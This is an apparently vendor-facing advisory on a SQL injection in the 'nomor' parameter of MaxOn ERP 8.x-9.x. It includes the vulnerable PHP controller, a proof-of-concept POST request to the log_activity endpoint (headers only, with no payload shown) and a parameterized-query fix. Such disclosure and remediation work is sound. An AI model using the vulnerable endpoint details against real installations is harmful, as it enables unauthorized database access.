## Vulnerability Overview

MaxOn ERP Software versions 8.x-9.x contain a SQL injection vulnerability in the 'nomor' parameter. The vulnerability allows any user to execute SQL injection code; the affected code is at line 350 of [PATH]/pos/controllers/User.php and line 414 of [PATH]/application/controllers/User.php.

## Affected Scope

- Software version: MaxOn ERP Software 8.x-9.x
- Platform: PHP
- Tested on: WIN7 x64/KaliLinux x64
- Vulnerability type: SQL injection

## Remediation

1. Code review and fix:
   - Review and fix the SQL query logic in [PATH]/pos/controllers/User.php and [PATH]/application/controllers/User.php, making sure user input is properly filtered and escaped.
   - Use parameterized queries or prepared statements to prevent SQL injection.
2. Update the software:
   - Upgrade to the latest version of MaxOn ERP Software to obtain the latest security patches and fixes.
3. Security configuration:
   - Configure a web application firewall (WAF) to detect and block SQL injection attacks.
   - Regularly update and maintain the system so that all components are on current versions.

## POC Code

```text
Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
Dork: N/A
Date: 2018-10-15
Exploit Author: Ihsan Sencan
Vendor Homepage: http://www.talagasoft.com
Software Link: http://demo.maxonerp.com
Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar
Version: 8.x-9.x
Tested on: WIN7 x64/KaliLinux x64
CVE: N/A

Description
All users can run SQL injection code.

[PATH]/pos/controllers/User.php Line:350
[PATH]/application/controllers/User.php Line:414
```

The vulnerable controller method (user input is concatenated directly into the query string):

```php
function log_activity(){
    // Base query; every filter below is appended as a raw string fragment.
    $sql="select * from syslog where 1=1";
    $nomor="";$jenis="";$user="";
    if($this->input->post()){
        // 'nomor' is taken from the POST body and embedded unescaped in the SQL.
        if($nomor=$this->input->post('nomor')){
            if($nomor!="")$sql.=" and no_bukti='$nomor'";
        }
        if($user=$this->input->post('user')){
            if($user!="")$sql.=" and userid='$user'";
        }
        if($jenis=$this->input->post('jenis')){
            if($jenis!="")$sql.=" and jenis_cmd='$jenis'";
        }
    }
    $sql.=" order by tgljm desc limit 1000";
    $data["user"]=$user;
    $data["nomor"]=$nomor;
    $data["jenis"]=$jenis;
    // The concatenated string is executed without any parameter binding.
    $data["syslog"]=$this->db->query($sql);
    $this->template->display("log_list",$data);
}
```

POC:

1) http://TARGET/[PATH]/index.php/user/log_activity

```http
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b02d8e489cd16703fa5d06327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
```
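The parameterized-query fix recommended in the remediation section, written out as an added example (not MaxOn's own code): `log_activity()` rebuilt so that the `nomor`, `user` and `jenis` values are passed to the database as bound parameters. It assumes the CodeIgniter 3 query-binding API (`$this->db->query($sql, $bindings)` with `?` placeholders) and the column names used by the vulnerable function.

```php
<?php
// Added example, not MaxOn's own code: the log_activity() controller method
// rewritten so every user-supplied filter value travels to the database as a
// bound parameter instead of being concatenated into the SQL string.
// Assumes CodeIgniter 3 ($this->db->query($sql, $bindings) with '?'
// placeholders) and the column names used by the vulnerable function.
class User extends CI_Controller
{
    public function log_activity()
    {
        $sql      = "SELECT * FROM syslog WHERE 1=1";
        $bindings = array();

        // POST field => column. Column names are fixed strings from this code,
        // never taken from the request, so only the values need binding.
        $filters = array(
            'nomor' => 'no_bukti',
            'user'  => 'userid',
            'jenis' => 'jenis_cmd',
        );
        $data = array('user' => '', 'nomor' => '', 'jenis' => '');

        if ($this->input->post()) {
            foreach ($filters as $field => $column) {
                $value = (string) $this->input->post($field);
                if ($value !== '') {
                    $sql       .= " AND {$column} = ?"; // placeholder only
                    $bindings[] = $value;               // escaped by the driver
                }
                $data[$field] = $value; // echoed back into the form by the view
            }
        }

        $sql .= " ORDER BY tgljm DESC LIMIT 1000";

        // A quote inside 'nomor' is now plain data: it cannot close the string
        // literal or append clauses, so a crafted POST body can only match rows
        // whose no_bukti equals the literal text that was sent.
        $data["syslog"] = $this->db->query($sql, $bindings);
        $this->template->display("log_list", $data);
    }
}
```

The view (log_list) should still HTML-escape the echoed `user`, `nomor` and `jenis` values, since binding protects the database, not the rendered page.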